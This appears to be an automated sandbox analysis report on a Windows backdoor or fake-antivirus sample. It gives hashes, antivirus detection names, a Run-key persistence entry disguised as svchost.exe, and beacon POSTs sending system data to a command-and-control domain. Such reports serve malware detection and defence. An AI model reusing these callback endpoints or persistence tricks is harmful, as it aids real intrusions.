Analysis Date: 2014-07-19 04:36:54
MD5: 16ded6fa4285fa085836d6946ee702c1
SHA1: 8459524fd69adab3c6ed3982ab8df57de331616c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: d1848d8dadcd26872e6d163f9c865c8a sha1: cc48cff93f7155d074c891c3626c04ab2240f819 size: 58880
Section: .rdata md5: f7fd1edacf37c539fdbfa1ac22cdcec3 sha1: d7856f1a2c0e49ac22495896076742777d28948c size: 2048
Section: .data md5: b24a1d771b64b6aec24c124e0d9a4226 sha1: 55d4e261d1a35ea70347bb3c72b4f4a349c141c7 size: 41984
Section: .rsrc md5: 437fa968f2f96af2a13c6c96bb8ad543 sha1: d5df2a691461b7e8f0383a2439287b7a40c3fd45 size: 1024
Timestamp: 2005-11-16 10:00:36
Version:
  LegalCopyright: Copyright (C) 2010
  ProductVersion: 1, 0, 0, 2
  PrivateBuild: 1091
  FileVersion: 1, 0, 0, 2
  FileDescription: Windows Host Process
PEhash: 41c7fcd2f9e05434182bdcc93bd1114210745c33
IMPhash: 9b325cfee6a7f1f0e49b58f9f998183b
AV: 360 Safe - Gen:Variant.Kazy.2518
AV: Ad-Aware - Gen:Variant.Kazy.2518
AV: Alwil (avast) - MalOb-IJ [Cryp]
AV: Arcabit (arcavir) - Packed.Krap.Hy
AV: Authentium - W32/Goolbot.A.gen!Eldorado
AV: Avira (antivir) - TR/Crypt.XPACK.Gen
AV: CA (E-Trust Ino) - Win32/FakeAV.S!generic
AV: CAT (quickheal) - Backdoor.Cycbot.B
AV: ClamAV - Trojan.Agent-180276
AV: Dr. Web - Trojan.Siggen2.7184
AV: Emsisoft - Gen:Variant.Kazy.2518
AV: Eset (nod32) - Win32/Kryptik.HUN
AV: Fortinet - W32/Codepack.SJT!tr
AV: Frisk (f-prot) - W32/Goolbot.A.gen!Eldorado (generic, not disinfectable)
AV: F-Secure - Gen:Variant.Kazy.2518
AV: Grisoft (avg) - Cryptic.BEN
AV: Ikarus - Trojan.Win32.FakeAV
AV: K7 - Backdoor ( 003210941 )
AV: Kaspersky - Packed.Win32.Krap.hy
AV: MalwareBytes - Trojan.Agent
AV: Mcafee - BackDoor-EXI
AV: Microsoft Security Essentials - Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan) - Gen:Variant.Kazy.2518
AV: Norman - swizzor/Heur.I
AV: Rising - no_virus
AV: Sophos - Mal/FakeAV-IS
AV: Symantec - Trojan.FakeAV!gen39
AV: Trend Micro - BKDR_CYCBOT.SME
AV: VirusBlokAda (vba32) - no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: www.google.com
Winsock DNS: bookknowlege.com
Winsock DNS: 127.0.0.1
Winsock DNS: xy95.cn
Winsock DNS: freenetgameonline.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Network Details:

DNS: protectyourpc-11.com
Type: A
69.43.161.170
DNS: www.google.com
Type: A
173.194.121.48
DNS: www.google.com
Type: A
173.194.121.49
DNS: www.google.com
Type: A
173.194.121.50
DNS: www.google.com
Type: A
173.194.121.51
DNS: www.google.com
Type: A
173.194.121.52
DNS: xy95.cn
Type: A
DNS: freenetgameonline.com
Type: A
DNS: bookknowlege.com
Type: A
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err088_1_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err073_2_1&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_1_8&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err073_2_2&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_3&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err094_43_11001&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err093_43_11001&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1032 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1033 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1034 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1035 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1036 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1037 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1038 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1039 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1040 ➝ 173.194.121.48:80
Flows TCP: 192.168.1.1:1041 ➝ 173.194.121.48:80
Flows TCP: 192.168.1.1:1042 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1043 ➝ 69.43.161.170:80

Raw Pcap

Strings
040904b0
1, 0, 0, 2
1091
Copyright (C) 2010
FileDescription
FileVersion
LegalCopyright
&Main
MS Sans Serif
PrivateBuild
ProductVersion
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
Windows Host Process
ADVAPI32.dll
CoCreateInstance
CoInitialize
CoUninitialize
CreateClassMoniker
CreateWindowExW
@.data
DDRAW.dll
DefWindowProcW
DirectDrawCreate
DirectDrawCreateEx
DirectDrawEnumerateA
DispatchMessageW
EndDialog
ExitProcess
FreeEnvironmentStringsA
GetCommandLineA
GetModuleFileNameA
GetModuleHandleA
GetProcessVersion
GetRunningObjectTable
GetStartupInfoA
GetStdHandle
GetSystemMetrics
GetVersionExA
GetWindowRect
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
IsBadWritePtr
IsDlgButtonChecked
KERNEL32.dll
ole32.dll
PathAddBackslashW
PathAppendW
PathCombineW
PathFindExtensionW
PathRemoveFileSpecW
PostQuitMessage
`.rdata
RegCloseKey
RegCreateKeyExW
RegEnumValueA
RegEnumValueW
RegisterClassExW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
RtlUnwind
SetConsoleMode
SetUnhandledExceptionFilter
SetWindowPos
SHELL32.dll
ShellExecuteExW
SHLWAPI.dll
!This program cannot be run in DOS mode.
TranslateMessage
UnhandledExceptionFilter
USER32.dll
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
wsprintfW